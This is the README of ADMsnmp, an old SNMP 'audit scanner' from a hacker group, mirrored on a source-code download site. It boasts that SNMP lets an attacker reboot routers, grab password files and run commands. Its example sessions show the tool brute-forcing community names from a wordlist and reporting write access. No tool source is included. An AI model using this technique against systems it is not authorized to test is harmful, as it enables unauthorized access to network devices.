ADMsnmp.README
上传用户:lewson58
上传日期:2007-01-05
资源大小:7k
文件大小:7k
源码类别:

扫描程序

开发平台:

Unix_Linux

  1.                       ___      ______      _       _
  2.                     /        |   _      |     /  |
  3.                    |  /   |  |  |    |  |   _/   |
  4.                    | |___| |  |  |_ /  |  |   _/   |
  5. ..oO  THE          |  ---  |  |       /   |  |   |  |         CreW Oo..
  6.                    '''   '''   '''''''    ''''   ''''        
  7.                                presents
  8.                          [ ADMsnmp v 0.1 ]
  9.                       * SNMP audit scanner *
  10. ftp://ADM.isp.at/ADM/ADMsnmp.0.1.tar.gz
  11. http://ADM.isp.at/ADM/ADMsmp.0.1.tar.gz
  12. http://el8.org/~antilove/ADMsnmp.0.1.tar.gz
  13. ADMsnmp is an snmpd audit scanner.
  14. Any of you know how weak and funny snmp is?
  15. You can obtain a great deal of usefull info  like  admin name's, 
  16. you can play with the interface of the router, reboot the machine
  17. get the password file of the router (Ascend), or execute commands remoteley,
  18. anyway snmp is a BIG hole.
  19. ADMsnmp can brute force the snmp community name (with a wordfile) or
  20. make a wordfile list derived the hostname.
  21. ADMsnmp can report to you all valid community
  22. names found and inform you if writable access to the MIB has been attained.
  23. ADMsnmp is very easy to use and designed with speed in mind!
  24. here is an example session
  25. [root@ADM apps]# a.out  172.21.6.1  -wor snmp.passwd -sleep 1
  26. ADMsnmp vbeta 0.1 (c) The ADM crew
  27. ftp://ADM.isp.at/ADM/
  28. greets: !ADM, el8.org, ansia
  29. >>>>>>>>>>> get req name=root  id = 2 >>>>>>>>>>>
  30. >>>>>>>>>>> get req name=public   id = 5 >>>>>>>>>>>
  31. >>>>>>>>>>> get req name=private  id = 8 >>>>>>>>>>>
  32. >>>>>>>>>>> get req name=write  id = 11 >>>>>>>>>>>
  33. <<<<<<<<<<< recv snmpd paket id = 9 name = private ret =0 <<<<<<<<<<
  34. >>>>>>>>>>>> send setrequest id = 9 name = private >>>>>>>>
  35. >>>>>>>>>>> get req name=admin  id = 14 >>>>>>>>>>>
  36. <<<<<<<<<<< recv snmpd paket id = 10 name = private ret =0 <<<<<<<<<<
  37. >>>>>>>>>>> get req name=proxy  id = 17 >>>>>>>>>>>
  38. <<<<<<<<<<< recv snmpd paket id = 140 name = private ret =0 <<<<<<<<<<
  39. >>>>>>>>>>> get req name=ascend  id = 20 >>>>>>>>>>>
  40. <<<<<<<<<<< recv snmpd paket id = 140 name = private ret =0 <<<<<<<<<<
  41. >>>>>>>>>>> get req name=cisco  id = 23 >>>>>>>>>>>
  42. >>>>>>>>>>> get req name=router  id = 26 >>>>>>>>>>>
  43. >>>>>>>>>>> get req name=shiva  id = 29 >>>>>>>>>>>
  44. >>>>>>>>>>> get req name=all private  id = 32 >>>>>>>>>>>
  45. >>>>>>>>>>> get req name= private  id = 35 >>>>>>>>>>>
  46. >>>>>>>>>>> get req name=access  id = 38 >>>>>>>>>>>
  47. >>>>>>>>>>> get req name=snmp  id = 41 >>>>>>>>>>>
  48. <!ADM!>         snmp check on router.dream.on.it                <!ADM!>
  49. sys.sysName.0:router.dream.on.it
  50. name = private write access
  51.  
  52. ADMsnmp inform's you if it has write access to the MIB with the community name private.
  53. snmpwalk <ip> <community name>  and enjoy ;)
  54. another example ADMsnmp localhost -g  (with the guessname option)
  55. ADMsnmp vbeta 0.1 (c) The ADM crew
  56. ftp://ADM.isp.at/ADM/
  57. greets: !ADM, el8.org, ansia
  58. >>>>>>>>>>> get req name=public   id = 2 >>>>>>>>>>>
  59. <<<<<<<<<<< recv snmpd paket id = 3 name = public  ret =2 <<<<<<<<<<
  60. >>>>>>>>>>> get req name=private  id = 5 >>>>>>>>>>>
  61. <<<<<<<<<<< recv snmpd paket id = 4 name = public  ret =2 <<<<<<<<<<
  62. >>>>>>>>>>> get req name=localhost95  id = 8 >>>>>>>>>>>
  63. <<<<<<<<<<< recv snmpd paket id = 6 name = private ret =0 <<<<<<<<<<
  64. >>>>>>>>>>>> send setrequest id = 6 name = private >>>>>>>>
  65. >>>>>>>>>>> get req name=localhost96  id = 11 >>>>>>>>>>>
  66. <<<<<<<<<<< recv snmpd paket id = 7 name = private ret =0 <<<<<<<<<<
  67. >>>>>>>>>>> get req name=localhost97  id = 14 >>>>>>>>>>>
  68. <<<<<<<<<<< recv snmpd paket id = 9 name = localhost95 ret =2 <<<<<<<<
  69. <<
  70. >>>>>>>>>>> get req name=localhost98  id = 17 >>>>>>>>>>>
  71. <<<<<<<<<<< recv snmpd paket id = 10 name = localhost95 ret =2 <<<<<<<
  72. <<<
  73. >>>>>>>>>>> get req name=localhost99  id = 20 >>>>>>>>>>>
  74. <<<<<<<<<<< recv snmpd paket id = 137 name = private ret =0 <<<<<<<<<<
  75. >>>>>>>>>>> get req name=localhost0  id = 23 >>>>>>>>>>>
  76. <<<<<<<<<<< recv snmpd paket id = 137 name = private ret =0 <<<<<<<<<<
  77. >>>>>>>>>>> get req name=localhost1  id = 26 >>>>>>>>>>>
  78. <<<<<<<<<<< recv snmpd paket id = 12 name = localhost96 ret =2 <<<<<<<
  79. <<<
  80. >>>>>>>>>>> get req name=localhost2  id = 29 >>>>>>>>>>>
  81. <<<<<<<<<<< recv snmpd paket id = 13 name = localhost96 ret =2 <<<<<<<
  82. <<<
  83. >>>>>>>>>>> get req name=localhost3  id = 32 >>>>>>>>>>>
  84. <<<<<<<<<<< recv snmpd paket id = 15 name = localhost97 ret =2 <<<<<<<
  85. <<<
  86. >>>>>>>>>>> get req name=localhost4  id = 35 >>>>>>>>>>>
  87. <<<<<<<<<<< recv snmpd paket id = 16 name = localhost97 ret =2 <<<<<<<
  88. <<<
  89. >>>>>>>>>>> get req name=localhost5  id = 38 >>>>>>>>>>>
  90. <<<<<<<<<<< recv snmpd paket id = 18 name = localhost98 ret =2 <<<<<<<
  91. <<<
  92. >>>>>>>>>>> get req name=localhost6  id = 41 >>>>>>>>>>>
  93. <<<<<<<<<<< recv snmpd paket id = 19 name = localhost98 ret =2 <<<<<<<
  94. <<<
  95. >>>>>>>>>>> get req name=localhost7  id = 44 >>>>>>>>>>>
  96. <<<<<<<<<<< recv snmpd paket id = 21 name = localhost99 ret =2 <<<<<<<
  97. <<<
  98. >>>>>>>>>>> get req name=localhost8  id = 47 >>>>>>>>>>>
  99. <<<<<<<<<<< recv snmpd paket id = 22 name = localhost99 ret =2 <<<<<<<
  100. <<<
  101. >>>>>>>>>>> get req name=localhost9  id = 50 >>>>>>>>>>>
  102. <<<<<<<<<<< recv snmpd paket id = 24 name = localhost0 ret =2 <<<<<<<<
  103. <<
  104. >>>>>>>>>>> get req name=localhost10  id = 53 >>>>>>>>>>>
  105. <<<<<<<<<<< recv snmpd paket id = 25 name = localhost0 ret =2 <<<<<<<<
  106. <<
  107. >>>>>>>>>>> get req name=localhost00  id = 56 >>>>>>>>>>>
  108. <<<<<<<<<<< recv snmpd paket id = 27 name = localhost1 ret =2 <<<<<<<<
  109. <<
  110. >>>>>>>>>>> get req name=localhost01  id = 59 >>>>>>>>>>>
  111. <<<<<<<<<<< recv snmpd paket id = 28 name = localhost1 ret =2 <<<<<<<<
  112. <<
  113. >>>>>>>>>>> get req name=localhost02  id = 62 >>>>>>>>>>>
  114. <<<<<<<<<<< recv snmpd paket id = 30 name = localhost2 ret =2 <<<<<<<<
  115. <<
  116. >>>>>>>>>>> get req name=localhost03  id = 65 >>>>>>>>>>>
  117. <<<<<<<<<<< recv snmpd paket id = 31 name = localhost2 ret =2 <<<<<<<<
  118. >>>>>>>>>>> get req name=localhost04  id = 68 >>>>>>>>>>>
  119. <<<<<<<<<<< recv snmpd paket id = 33 name = localhost3 ret =2 <<<<<<<<
  120. <<
  121. >>>>>>>>>>> get req name=localhost05  id = 71 >>>>>>>>>>>
  122. <<<<<<<<<<< recv snmpd paket id = 34 name = localhost3 ret =2 <<<<<<<<
  123. <<
  124. >>>>>>>>>>> get req name=localhost06  id = 74 >>>>>>>>>>>
  125. <<<<<<<<<<< recv snmpd paket id = 36 name = localhost4 ret =2 <<<<<<<<
  126. <<
  127. >>>>>>>>>>> get req name=localhost07  id = 77 >>>>>>>>>>>
  128. <<<<<<<<<<< recv snmpd paket id = 37 name = localhost4 ret =2 <<<<<<<<
  129. <<
  130. >>>>>>>>>>> get req name=localhost08  id = 80 >>>>>>>>>>>
  131. <<<<<<<<<<< recv snmpd paket id = 39 name = localhost5 ret =2 <<<<<<<<
  132. <<
  133. >>>>>>>>>>> get req name=localhost09  id = 83 >>>>>>>>>>>
  134. <<<<<<<<<<< recv snmpd paket id = 40 name = localhost5 ret =2 <<<<<<<<
  135. <<
  136. >>>>>>>>>>> get req name=localhost10  id = 86 >>>>>>>>>>>
  137. <<<<<<<<<<< recv snmpd paket id = 42 name = localhost6 ret =2 <<<<<<<<
  138. <<
  139. >>>>>>>>>>> get req name=LOCALHOST95  id = 89 >>>>>>>>>>>
  140.  etc..
  141. ADMsnmp is available on 
  142. ftp://ADM.isp.at/ADM/ADMsnmp.0.1.tar.gz
  143. http://ADM.isp.at/ADM/ADMsmp.0.1.tar.gz
  144. http://el8.org/~antilove/ADMsnmp.0.1.tar.gz
  145. happy snmp walking :)
  146. The ADM Crew
  147. (thx to #as400 who help me to boot my as400 )